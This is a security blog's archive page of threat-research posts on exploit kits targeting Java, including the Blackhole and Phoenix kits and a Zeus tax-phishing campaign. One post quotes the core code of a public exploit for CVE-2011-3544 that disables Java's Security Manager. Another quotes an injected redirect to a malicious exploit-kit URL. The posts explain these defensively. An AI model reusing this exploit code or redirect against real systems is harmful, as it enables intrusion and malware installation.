Posts Tagged ‘Java’

View All CybercrimeView All MalwareView All Vulnerabilities

Prevalent Exploit Kits Updated with a New Java Exploit

By Daniel Chechik  •  December 16th, 2011  •   Cybercrime Malware Vulnerabilities

Until recently, most of the vulnerabilities exploited by popular exploit kits were found last year or even earlier. Moreover, it would take authors at least a month to update their kits with the new exploits that had been discovered in the wild. However, in the past few weeks, authors released an updated version of their kits with a new recent exploit before a patch had been released.

First, a new version of the Blackhole exploit kit was released, version 1.2.1:

Live Blackhole Exploit Kit control panel
Live Blackhole Exploit Kit control panel

The Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited.
A few days later, a new version of Phoenix exploit kit 3.0 was released,  just a few weeks after the release of its predecessor, Phoenix 2.9.

Live Phoenix Exploit Kit 3.0 control panel

Live Phoenix Exploit Kit 3.0 control panel

Notice the red boxes in the screen shots above: A new exploit was added to those exploit kits, which is the reason for the upgrade.

A few weeks ago Michael ‘mihi’ Schierl described a design error in Java. Basically this vulnerability is similar to other Java vulnerabilities where an untrusted code is executed in elevated privileges. Rhino is a Javascript engine that runs under the JVM and can interact with Java applets. An attacker can bypass the scripting engine protection by generating an error object, using Rhino script, which runs in elevated privileges and executing code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.

Not long after the discovery, an exploit module was published in Metasploit. First, the code binds a Rhino object with the applet:

import javax.script.*;

ScriptEngine engine = new ScriptEngineManager().getEngineByName(“js”);
Bindings b = engine.createBindings();
b.put(“applet”, this);

The Java code executes a script that bypasses the Security Manager protection by using the “toString” method inside a script context:

Object proxy = (Object) engine.eval(
“this.toString = function() {” +
“                      java.lang.System.setSecurityManager(null);” +
“                      applet.callBack();” +
“                      return String.fromCharCode(97 + Math.round(Math.random() * 25));”+
“};” +
“e = new Error();” +
“e.message = this;” +
“e”, b);

The script throws an exception, and the rest of the code would be executed.

catch (ScriptException e) {
e.printStackTrace();
}

The vulnerability is cross-platform and doesn’t require heap spray or buffer overflow techniques. That makes it very effective and therefore authors of exploit kits rushed to add it to their kits. The concerning aspect is that the Blackhole exploit kit was updated even before a patch was released by the vendor.

Customers of all versions of M86 Secure Web Gateway are safe, as it provides zero-day protection against this vulnerability by default.

We highly encourage users to keep their Java updated, or remove it if it is not needed. A patch for this Java vulnerability is available by now: Look for Java 6 Update 29, or Java 7 Update 1.

Tags:    |    |    |    |    |  

View All Cybercrime

Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik  •  June 4th, 2011  •   Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time, it was not really useable, as it required activating by the author of the exploit kit. It contains an activation page that is being used to load all the exploits to the server for every specific customer. As expected, the author of the exploit kit released a new version of the tool, version 2.7.

Phoenix Exploit’s Kit 2.7 logo

Phoenix Exploit’s Kit 2.7 logo

The changes between the two versions are minor, but still very important as most exploits become inefficient in the very short term, especially with the latest IE vulnerabilities.

Read More

Tags:    |    |    |  

View All Malware

Don’t Pay Your Taxes

By Gavin Neale  •  December 5th, 2010  •   Malware

Or at least try to ensure that your money doesn’t end up in the hands of criminals using the Zeus crimeware kit, which could happen if you fall for this latest malicious email campaign targeting tax payers. The emails are being sent from one of the Pushdo/Cutwail botnets and the campaign is very similar to the EFTPS one we previously blogged about. The main difference is the use of legitimate hacked websites and a range of exploits targeting vulnerabilities in client side software such as Java and Adobe PDF readers.

The malicious email claims that your tax payment has been rejected and provides a link for you to check your information:

The link in the email, which appears to go to eftps.gov, actually goes to one of many web pages which have been uploaded to hacked web servers. The pages contain the obfuscated JavaScript shown below:

All of this script has the effect of adding just one new  line of JavaScript to the current page: location.replace(“http://[removed]autocom.ru/trafflit.php”). This code tells the browser to browse to a new URL that is hosting the SEO exploit kit which contains the  JavaScript below.

This JavaScript determines if Java (Oracle Java, not JavaScript) is enabled and then redirects the browser again to the page rotator.php on the same server. Rotator.php contains exploits for four Java vulnerabilities and prompts you to download and open the file asshole.pdf. This PDF file, when opened in Adobe Reader attempts to detect the version and then launch an appropriate exploit if the detected version is known to be vulnerable.

The end goal of all these redirects and exploits is to install the notorious Zeus crimeware bot onto the victim’s machine. This is the VirusTotal report for the Zeus sample we collected. Zeus is well known for helping criminals steal login credentials as victims’ browse their online bank accounts and to transfer money into accounts under the criminals’ control.

Tags:    |    |    |    |    |  

View All Vulnerabilities

Don’t Get Infected By Zombies

By Gavin Neale  •  October 15th, 2010  •   Vulnerabilities

Today we had a peek inside an exploit kit known as the Zombie Infection Kit. This kit is not as widely used as some of the more popular kits such as Eleonore and Phoenix and compared to these other kits, Zombie is not really that sophisticated. However it does carry the usual range of exploits that have been effectively used in many other exploit tool kits. Potential victims are forced to visit Zombie’s exploit page when their browser loads an IFrame placed on a compromised website. All of the vulnerabilities exploited by this kit have been patched by the vendors concerned.

As well as exploiting an old vulnerability in IE 6 and the recent Windows help center vulnerability, the Zombie Infection Kit also uses exploits targeting two Java vulnerabilities, four vulnerabilities in Adobe PDF readers and two vulnerabilities in Adobe Flash.

Success rates for the various exploits use by the Zombie infection kit

According to the exploit statistics page in the admin control panel, the two most successful vulnerabilities are in Oracle’s Java, accounting for just over 60 percent of successful infections between them. Following closely behind the Java vulnerabilities is ‘PDF’ which is actually a PDF file containing exploits for four Adobe PDF vulnerabilities; the most recent of which (CVE-2009-4324) has been patched since December 2009.

Another stats page shows a breakdown of victims by browser type, showing the percentage of successful installs for each browser.

Victim browser statistics. The last column is the percentage of successfully infected victims.

This table isn’t really indicative of how secure each browser is, as only Internet Explorer is targeted for browser specific vulnerabilities whereas all browsers are used to target vulnerabilities in Adobe Flash and PDF readers, and Java.

What this does show is that 15 percent (15.39 in the top row of the browser stats image, above) of ‘visitors’ were successfully exploited by the Zombie Infection Kit and made to download a malicious executable. Because Java vulnerabilities accounted for 60 percent of infections, a surprising nine percent of all visitors were infected just by having an old version of java installed.

Java exploits are becoming increasingly useful for web attackers, as many people don’t even know that Java is installed on their machines, or that it may need to be updated. What is worse is that it is possible to have multiple versions of Java installed on a machine so you can still be vulnerable even after you install the latest version, giving you a false sense of security.

We strongly recommend users uninstall Java if they don’t use it, or remove old versions and upgrade to the latest version just released by Oracle which fixes 29 flaws in the previous version for which exploits have recently been published.

Tags:    |    |    |  

View All Spam

Malicious EFTPS Tax campaign

By Phil Hay  •  September 14th, 2010  •   Spam

Today we noticed some unusual looking messages claiming to be from the the Electronic Federal Tax Payment System (EFTPS).  Spam with a tax theme always piques our curiosity, so we took a closer look.

Read More

Tags:    |    |    |    |